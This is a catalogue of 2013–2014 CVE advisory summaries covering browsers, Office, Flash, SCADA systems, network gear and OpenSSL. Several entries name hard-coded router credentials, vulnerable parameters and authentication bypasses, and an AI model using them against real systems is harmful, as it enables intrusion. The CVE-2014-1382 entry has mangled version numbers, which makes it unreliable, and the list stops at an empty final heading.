CVE-2013-2780: Siemens SIMATIC S7-1200 PLCs 2.x and 3.x allow remote attackers to cause a denial of service (defect-mode transition and control outage) via crafted packets to UDP port 161 (aka the SNMP port).

CVE-2013-2803: ProSoft RadioLinx ControlScape before 6.00.040 uses a deficient PRNG algorithm and seeding strategy for passphrases, which makes it easier for remote attackers to obtain access via a brute-force attack.

CVE-2013-2824: Schneider Electric StruxureWare SCADA Expert Vijeo Citect 7.40, Vijeo Citect 7.20 through 7.30SP1, CitectSCADA 7.20 through 7.30SP1, StruxureWare PowerSCADA Expert 7.30 through 7.30SR1, and PowerLogic SCADA 7.20 through 7.20SR1 do not properly handle exceptions, which allows remote attackers to cause a denial of service via a crafted packet.

CVE-2013-2826: WellinTech KingSCADA before 3.1.2, KingAlarm&Event before 3.1, and KingGraphic before 3.1.2 perform authentication on the KAEClientManager console rather than on the server, which allows remote attackers to bypass intended access restrictions and discover credentials via a crafted packet to TCP port 8130.

CVE-2013-2920: The DoResolveRelativeHost function in url/url_canon_relative.cc in Google Chrome before 30.0.1599.66 allows remote attackers to cause a denial of service (out-of-bounds read) via a relative URL containing a hostname, as demonstrated by a protocol-relative URL beginning with a www.google.com substring.

CVE-2013-3064: Open redirect vulnerability in ui/dynamic/unsecured.html in Linksys EA6500 with firmware 1.1.28.147876 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the target parameter.

CVE-2013-3116: Microsoft Internet Explorer 7 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3137: Microsoft FrontPage 2003 SP3 does not properly parse DTDs, which allows remote attackers to obtain sensitive information via crafted XML data in a FrontPage document, aka "XML Disclosure Vulnerability."

CVE-2013-3194: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3199: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3201: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3203, CVE-2013-3206, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3206: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3201, CVE-2013-3203, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3280: EMC RSA Authentication Agent 7.1.x before 7.1.2 for Web for Internet Information Services has a fail-open design, which allows remote attackers to bypass intended access restrictions via vectors that trigger an agent crash.

CVE-2013-3387: Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance 8.6 and 9.x before 9.2(1) allows remote attackers to cause a denial of service (disk consumption) via a flood of TCP packets to port 5400, leading to large error-log files, aka Bug ID CSCua42724.

CVE-2013-3417: The administrative web interface in Cisco Video Surveillance Operations Manager does not properly perform authentication, which allows remote attackers to watch video feeds via a crafted URL, aka Bug ID CSCtg72262.

CVE-2013-3632: The Cron service in rpc.php in OpenMediaVault allows remote authenticated users to execute cron jobs as arbitrary users and execute arbitrary commands via the username parameter.

CVE-2013-3656: Cybozu Office 9.1.0 and earlier does not properly manage sessions, which allows remote attackers to bypass authentication by leveraging knowledge of a login URL.

CVE-2013-3856: Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."

CVE-2013-3860: Microsoft .NET Framework 2.0 SP2, 3.5, 3.5 SP1, 3.5.1, 4, and 4.5 does not properly parse a DTD during XML digital-signature validation, which allows remote attackers to cause a denial of service (application crash or hang) via a crafted signed XML document, aka "Entity Expansion Vulnerability."

CVE-2013-3893: Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help: URL that triggers loading of hxds.dll.

CVE-2013-3897: Use-after-free vulnerability in the CDisplayPointer class in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted JavaScript code that uses the onpropertychange event handler, as exploited in the wild in September and October 2013, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2013-3900: The WinVerifyTrust function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 does not properly validate PE file digests during Authenticode signature verification, which allows remote attackers to execute arbitrary code via a crafted PE file, aka "WinVerifyTrust Signature Validation Vulnerability."

CVE-2013-3905: Microsoft Outlook 2007 SP3, 2010 SP1 and SP2, 2013, and 2013 RT does not properly expand metadata contained in S/MIME certificates, which allows remote attackers to obtain sensitive network configuration and state information via a crafted certificate in an e-mail message, aka "S/MIME AIA Vulnerability."

CVE-2013-4223: The Gentoo Nullmailer package before 1.11-r2 uses world-readable permissions for /etc/nullmailer/remotes, which allows local users to obtain SMTP authentication credentials by reading the file.

CVE-2013-4436: The default configuration for salt-ssh in Salt (aka SaltStack) 0.17.0 does not validate the SSH host key of requests, which allows remote attackers to have unspecified impact via a man-in-the-middle (MITM) attack.

CVE-2013-4478: Sup before 0.13.2.1 and 0.14.x before 0.14.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the filename of an email attachment.

CVE-2013-4529: Buffer overflow in hw/pci/pcie_aer.c in QEMU before 1.7.2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a large log_num value in a savevm image.

CVE-2013-4555: Cross-site request forgery (CSRF) vulnerability in ecrire/action/logout.php in SPIP before 2.1.24 allows remote attackers to hijack the authentication of arbitrary users for requests that logout the user via unspecified vectors.

CVE-2013-4776: NETGEAR ProSafe GS724Tv3 and GS716Tv2 with firmware 5.4.1.13 and earlier, GS748Tv4 5.4.1.14, and GS510TP 5.0.4.4 allows remote attackers to cause a denial of service (reboot or crash) via a crafted HTTP request to filesystem/.

CVE-2013-4782: The Supermicro BMC implementation allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password.

CVE-2013-5057: hxds.dll in Microsoft Office 2007 SP3 and 2010 SP1 and SP2 does not implement the ASLR protection mechanism, which makes it easier for remote attackers to execute arbitrary code via a crafted COM component on a web site that is visited with Internet Explorer, as exploited in the wild in December 2013, aka "HXDS ASLR Vulnerability."

CVE-2013-5369: IBM SPSS Analytical Decision Management 6.1 before IF1, 6.2 before IF1, and 7.0 before FP1 IF6 might allow remote attackers to execute arbitrary code by deploying and accessing a service.

CVE-2013-5428: IBM WebSphere DataPower XC10 appliances 2.5.0 do not require authentication for all administrative actions, which allows remote attackers to cause a denial of service via unspecified vectors.

CVE-2013-5431: Open redirect vulnerability in IBM Tivoli Federated Identity Manager (TFIM) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.

CVE-2013-5494: Cross-site request forgery (CSRF) vulnerability in the web framework in Cisco Unified MeetingPlace Solution, as used in Unified MeetingPlace Web Conferencing and Unified MeetingPlace, allows remote attackers to hijack the authentication of arbitrary users, aka Bug IDs CSCui45209 and CSCui44674.

CVE-2013-5507: The IPsec implementation in Cisco Adaptive Security Appliance (ASA) Software 9.1 before 9.1(1.7), when an IPsec VPN tunnel is enabled, allows remote attackers to cause a denial of service (device reload) via a (1) ICMP or (2) ICMPv6 packet that is improperly handled during decryption, aka Bug ID CSCue18975.

CVE-2013-5536: Cisco Secure Access Control System (ACS) does not properly implement an incoming-packet firewall rule, which allows remote attackers to cause a denial of service (process crash) via a flood of crafted packets, aka Bug ID CSCui51521.

CVE-2013-5559: Buffer overflow in the Active Template Library (ATL) framework in the VPNAPI COM module in Cisco AnyConnect Secure Mobility Client 2.x allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document, aka Bug ID CSCuj58139.

CVE-2013-5561: The Safe Search enforcement feature in Cisco Adaptive Security Appliance (ASA) CX Context-Aware Security Software does not properly perform filtering, which allows remote attackers to bypass intended policy restrictions via unspecified vectors, aka Bug ID CSCui94622.

CVE-2013-5751: Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors.

CVE-2013-5757: Absolute path traversal vulnerability in Yealink VoIP Phone SIP-T38G allows remote authenticated users to read arbitrary files via a full pathname in the dumpConfigFile function in the command parameter to cgi-bin/cgiServer.exx.

CVE-2013-5828: Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1, EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3, and EM Plugin for DB 12.1.0.2 and 12.1.0.3 allows remote attackers to affect integrity via unknown vectors related to Storage Management.

CVE-2013-6167: Mozilla Firefox through 27 sends HTTP Cookie headers without first validating that they have the required character-set restrictions, which allows remote attackers to conduct the equivalent of a persistent Logout CSRF attack via a crafted parameter that forces a web application to set a malformed cookie within an HTTP response.

CVE-2013-6188: Cross-site request forgery (CSRF) vulnerability in HP System Management Homepage (SMH) 7.1 through 7.2.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.

CVE-2013-6284: Unspecified vulnerability in the Statutory Reporting for Insurance (FS-SR) component in the Financial Services module for SAP ERP Central Component (ECC) allows attackers to execute arbitrary code via unspecified vectors, related to a "code injection vulnerability."

CVE-2013-6396: The OpenStack Python client library for Swift (python-swiftclient) 1.0 through 1.9.0 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-6475: Multiple integer overflows in (1) OPVPOutputDev.cxx and (2) oprs/OPVPSplash.cxx in the pdftoopvp filter in CUPS and cups-filters before 1.0.47 allow remote attackers to execute arbitrary code via a crafted PDF file, which triggers a heap-based buffer overflow.

CVE-2013-6660: The drag-and-drop implementation in Google Chrome before 33.0.1750.117 does not properly restrict the information in WebDropData data structures, which allows remote attackers to discover full pathnames via a crafted web site.

CVE-2013-6699: The Control and Provisioning of Wireless Access Points (CAPWAP) protocol implementation on Cisco Wireless LAN Controller (WLC) devices allows remote attackers to cause a denial of service via a crafted CAPWAP packet that triggers a buffer over-read, aka Bug ID CSCuh81880.

CVE-2013-6702: The management implementation on Cisco ONS 15454 controller cards with software 9.8 and earlier allows remote attackers to cause a denial of service (card reset) via crafted packets, aka Bug ID CSCtz50902.

CVE-2013-6979: The VTY authentication implementation in Cisco IOS XE 03.02.xx.SE and 03.03.xx.SE incorrectly relies on the Linux-IOS internal-network configuration, which allows remote attackers to bypass authentication by leveraging access to a 192.168.x.2 source IP address, aka Bug ID CSCuj90227.

CVE-2013-6994: OpenText Exceed OnDemand (EoD) 8 transmits the session ID in cleartext, which allows remote attackers to perform session fixation attacks by sniffing the network.

CVE-2013-7004: D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username.

CVE-2013-7043: Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Scientific Atlanta DPR2320R2 routers with software 2.0.2r1262-090417 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via the Password parameter to goform/RgSecurity, (2) reboot the device via the Restart parameter to goform/restart, (3) modify Wi-Fi settings, as demonstrated by the WpaPreSharedKey parameter to goform/wlanSecurity, or (4) modify parental controls via the ParentalPassword parameter to goform/RgParentalBasic.

CVE-2013-7389: Multiple cross-site scripting (XSS) vulnerabilities in D-Link DIR-645 Router (Rev. A1) with firmware before 1.04B11 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceid parameter to parentalcontrols/bind.php, (2) RESULT parameter to info.php, or (3) receiver parameter to bsc_sms_send.php.

CVE-2014-0001: Buffer overflow in client/mysql.cc in Oracle MySQL and MariaDB before 5.5.35 allows remote database servers to cause a denial of service (crash) and possibly execute arbitrary code via a long server version string.

CVE-2014-0035: The SymmetricBinding in Apache CXF before 2.6.13 and 2.7.x before 2.7.10, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-0160: The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

CVE-2014-0207: The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.

CVE-2014-0259: Microsoft Word 2007 SP3 and Office Compatibility Pack SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."

CVE-2014-0266: The XMLHTTP ActiveX controls in XML Core Services 3.0 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to bypass the Same Origin Policy via a web page that is visited in Internet Explorer, aka "MSXML Information Disclosure Vulnerability."

CVE-2014-0294: Microsoft Forefront Protection 2010 for Exchange Server does not properly parse e-mail content, which might allow remote attackers to execute arbitrary code via a crafted message, aka "RCE Vulnerability."

CVE-2014-0313: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-0321.

CVE-2014-0354: The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 1.00(BFQ.6)C0 has a hardcoded password of qweasdzxc for an unspecified account, which allows remote attackers to obtain index.asp login access via an HTTP request.

CVE-2014-0362: Cross-site scripting (XSS) vulnerability on Google Search Appliance (GSA) devices before 7.0.14.G.216 and 7.2 before 7.2.0.G.114, when dynamic navigation is configured, allows remote attackers to inject arbitrary web script or HTML via input included in a SCRIPT element.

CVE-2014-0433: Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote attackers to affect availability via unknown vectors related to Thread Pooling.

CVE-2014-0488: APT before 1.0.9 does not "invalidate repository data" when moving from an unauthenticated to authenticated state, which allows remote attackers to have unspecified impact via crafted repository data.

CVE-2014-0493: Adobe Reader and Acrobat 10.x before 10.1.9 and 11.x before 11.0.06 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0495.

CVE-2014-0494: Adobe Digital Editions 2.0.1 allows attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via unspecified vectors.

CVE-2014-0498: Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before 11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR SDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628 allows attackers to execute arbitrary code via unspecified vectors.

CVE-2014-0515: Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X and before 11.2.202.356 on Linux allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.

CVE-2014-0533: Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2014-0531 and CVE-2014-0532.

CVE-2014-0536: Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.

CVE-2014-0562: Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.1.12 and 11.x before 11.0.09 on OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Universal XSS (UXSS)."

CVE-2014-0577: Adobe Flash Player before 13.0.0.252 and 14.x and 15.x before 15.0.0.223 on Windows and OS X and before 11.2.202.418 on Linux, Adobe AIR before 15.0.0.356, Adobe AIR SDK before 15.0.0.356, and Adobe AIR SDK & Compiler before 15.0.0.356 allow attackers to execute arbitrary code by leveraging an unspecified "type confusion," a different vulnerability than CVE-2014-0584, CVE-2014-0585, CVE-2014-0586, and CVE-2014-0590.

CVE-2014-0765: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long GotoCmd argument.

CVE-2014-0767: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long AccessCode argument.

CVE-2014-0783: Stack-based buffer overflow in BKHOdeq.exe in Yokogawa CENTUM CS 3000 R3.09.50 and earlier allows remote attackers to execute arbitrary code via a crafted TCP packet.

CVE-2014-1330: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1342: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1349: Use-after-free vulnerability in Safari in Apple iOS before 7.1.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an invalid URL.

CVE-2014-1356: Heap-based buffer overflow in launchd in Apple iOS before 7.1.2, Apple OS X before 10.9.4, and Apple TV before 6.1.2 allows attackers to execute arbitrary code via a crafted application that sends IPC messages.

CVE-2014-1370: The byte-swapping implementation in copyfile in Apple OS X before 10.9.4 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds memory access and application crash) via a crafted AppleDouble file in a ZIP archive.

CVE-2014-1379: Graphics Drivers in Apple OS X before 10.9.4 allows attackers to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a 32-bit executable file for a crafted application.

CVE-2014-1382WebKit as used in Apple iOS before712 Apple Safari before 615 and 7xbefore 705 and Apple TV before 612allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption and application crash) via acrafted web site a different vulnerabilitythan other WebKit CVEs listed in APPLE-SA-2014-06-30-1 APPLE-SA-2014-06-30-3 and APPLE-SA-2014-06-30-4

CVE-2014-1466
SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.

CVE-2014-1472
Multiple cross-site scripting (XSS) vulnerabilities in the Enterprise Manager in McAfee Vulnerability Manager (MVM) 7.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.

CVE-2014-1477
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0, Firefox ESR 24.x before 24.3, Thunderbird before 24.3, and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1518
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0, Firefox ESR 24.x before 24.5, Thunderbird before 24.5, and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1563
Use-after-free vulnerability in the mozilla::DOM::SVGLength::GetTearOff function in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an SVG animation with DOM interaction that triggers incorrect cycle collection.

CVE-2014-1565
The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.

CVE-2014-1586
content/base/src/nsDocument.cpp in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.

CVE-2014-1701
The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 33.0.1750.149, does not implement a certain cross-origin restriction for the EventTarget.dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.

CVE-2014-1740
Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 34.0.1847.137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.

CVE-2014-1744
Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 35.0.1916.114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.

CVE-2014-1753
Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-1806
The .NET Remoting implementation in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, 4.5, and 4.5.1 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability."

CVE-2014-1808
Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability."

CVE-2014-1811
The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability."

CVE-2014-1812
The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability."

CVE-2014-2014
imapsync before 1.584, when running with the --tls option, attempts a cleartext login when a certificate verification failure occurs, which allows remote attackers to obtain credentials by sniffing the network.

CVE-2014-2103
Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets, aka Bug IDs CSCum52355 and CSCul49309.

CVE-2014-2109
The TCP Input module in Cisco IOS 12.2 through 12.4 and 15.0 through 15.4, when NAT is used, allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted TCP packets, aka Bug IDs CSCuh33843 and CSCuj41494.

CVE-2014-2364
Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx.

CVE-2014-2416
Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2417, and CVE-2014-2418.

CVE-2014-2554
OTRS 3.1.x before 3.1.21, 3.2.x before 3.2.16, and 3.3.x before 3.3.6 allows remote attackers to conduct clickjacking attacks via an IFRAME element.

CVE-2014-2643
Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.4 allows remote authenticated users to gain privileges via unknown vectors.

CVE-2014-2742
Isode M-Link before 16.0v7 does not properly restrict the processing of compressed XML elements, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XMPP stream, aka an "xmppbomb" attack.

CVE-2014-2768
Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2773.

CVE-2014-2789
Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2795, CVE-2014-2798, and CVE-2014-2804.

CVE-2014-2791
Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-2794
Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2788.

CVE-2014-2808
Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.

CVE-2014-2821
Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-3444
The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed 3gp file.

CVE-2014-3489
lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.

CVE-2014-3507
Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.

CVE-2014-3556
The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.

CVE-2014-3580
The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.

CVE-2014-3814
The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.

CVE-2014-3819
Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.

CVE-2014-3872
Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.

CVE-2014-4044
OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.

CVE-2014-4079
Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4082
Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4100
